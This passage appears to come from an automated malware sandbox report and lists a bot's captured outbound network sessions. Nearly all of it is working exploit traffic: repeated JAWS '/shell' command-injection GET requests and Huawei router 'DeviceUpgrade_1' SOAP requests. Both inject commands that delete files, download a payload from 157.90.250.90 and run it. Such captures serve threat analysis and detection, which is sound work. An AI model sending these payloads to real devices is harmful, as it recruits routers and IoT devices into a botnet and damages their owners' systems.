                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                94192.168.2.2333488125.111.75.10580
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:51.538219929 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                95192.168.2.23402768.43.2.15580
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:51.539057970 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                96192.168.2.234483023.93.194.13380
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:51.539916992 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                97192.168.2.236017699.212.18.16680
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:51.540522099 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                98192.168.2.233448264.69.46.20780
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:51.541137934 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                99192.168.2.23371761.252.247.6880
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:51.541731119 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                100192.168.2.2334760210.36.162.13680
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:51.542319059 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                101192.168.2.233484873.104.148.9580
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:51.564505100 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                102192.168.2.2354072194.18.61.9480
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:51.565176964 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                103192.168.2.23550862.233.134.11680
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:51.565702915 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                104192.168.2.2349154107.229.45.19180
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:51.566246033 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                105192.168.2.2340132128.106.21.14180
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:51.566771030 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                106192.168.2.2344762201.157.7.21780
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:51.567308903 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                107192.168.2.2355390103.104.235.12080
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:51.567888021 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                108192.168.2.2341618101.211.231.25180
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:51.568402052 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                109192.168.2.2356424145.20.17.1380
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:51.568932056 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                110192.168.2.2333352213.75.138.15580
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:51.569456100 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                111192.168.2.234599493.104.201.6580
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:51.569998980 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                112192.168.2.2336864159.157.188.5280
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:51.570539951 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                113192.168.2.2351820110.23.29.22080
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:51.571083069 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                114192.168.2.234811654.6.47.12480
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:51.571609020 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                115192.168.2.234100697.55.138.4880
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:51.572199106 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                116192.168.2.2360086176.10.51.16280
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:51.572736979 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                117192.168.2.2353464128.160.146.6280
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:51.780225039 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                118192.168.2.2349884175.136.0.20680
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:51.780927896 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                119192.168.2.235126817.188.107.7680
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:51.781517982 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                120192.168.2.234702458.233.196.22080
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:51.782078981 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                121192.168.2.234853857.247.150.10580
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:51.782917976 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                122192.168.2.2355198138.190.218.6480
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:51.783508062 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                123192.168.2.234482813.37.13.25180
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:51.784075975 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                124192.168.2.235596276.165.243.280
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:51.784656048 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                125192.168.2.2341832192.18.96.17380
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:51.785281897 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                126192.168.2.2338588143.95.246.7480
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:51.787276030 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                127192.168.2.2356048197.105.173.17037215
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:51.800451040 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Content-Length: 430
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                128192.168.2.235691446.96.134.25180
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:51.807641029 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                129192.168.2.2353260197.235.112.16037215
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:52.812622070 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Content-Length: 430
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                130192.168.2.2359226116.216.114.680
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:52.848752975 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                131192.168.2.2342840189.147.217.22480
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:52.849328041 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                132192.168.2.2339612191.228.77.21080
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:52.849864006 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                133192.168.2.2338702180.60.94.13280
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:52.964514017 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                134192.168.2.2335332174.196.88.17380
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:52.965183020 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                135192.168.2.2339456156.146.98.2480
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:52.965758085 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                136192.168.2.2340120131.59.130.9480
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:52.967680931 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                137192.168.2.2342236197.1.206.13937215
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:53.946511984 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Content-Length: 430
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
